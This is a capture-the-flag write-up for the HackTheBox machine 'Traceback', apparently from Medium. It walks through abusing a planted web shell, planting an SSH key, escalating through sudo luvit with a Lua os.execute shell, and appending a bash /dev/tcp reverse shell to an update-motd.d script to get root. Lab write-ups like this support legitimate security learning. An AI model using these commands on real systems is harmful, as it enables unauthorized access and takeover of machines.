HackTheBox — Traceback

Summary

Traceback is a easy flag with ip 10.10.10.181

Enumeration

Nmap

Web Enum

I tried to take a look for source

From the hint, I searched for Xh4H web shells, I found some shells

I dumped all shells names on txt file and used gobuster

I used admin:admin credentials to login

After that i deleted the default authorized_keys and upload my one

Let’s login now

Get user sysadmin

$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit

Afetr searching about lua
Create lua command shell:

echo "local t = os.execute('/bin/sh')" > rev.lua

execute rev.lua as sysadmin without password to get user:

sudo -u sysadmin /home/sysadmin/luvit rev.lua

Gain user flag!

Privilege Escalation

Enumerating the box using linpeas we see that we can modify files inside /etc/update-motd.d

I found this article that took about mot.d

I added a bash rev shell to 00-header

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/4334 0>&1'" >> /etc/update-motd.d/00-header

listen on port 4334 and ssh to the box from another terminal

Now if we ssh as webadmin, Should get root

root@strike:~# ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

8c221146c17c2a973a846f49xxxxxxxx


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Aug 15 06:23:37 2020 from 10.10.14.53
webadmin@traceback:~$

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to make height equal to word width only via CSS?

Automata x Binance AMA Recap!

This month at SoftwareMill we’ve learned [September’18]

Challenges in Edge Computing

Retrospectives for teams with multiple projects: Climbing the Mountains

Effective Product Engineering Starts With a Mindset Change

Ballerina How To: Data Micro Services

Python3: Mutable, Immutable… everything is object!

Taken from: https://images.app.goo.gl/SotugNSGu6SbWXEr5

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

FORGE — HackTheBox WriteUp

Auth0 CTF write-up

Retro WriteUp | TryHackMe | Utkar5hM

Empline — TryHackMe Writeup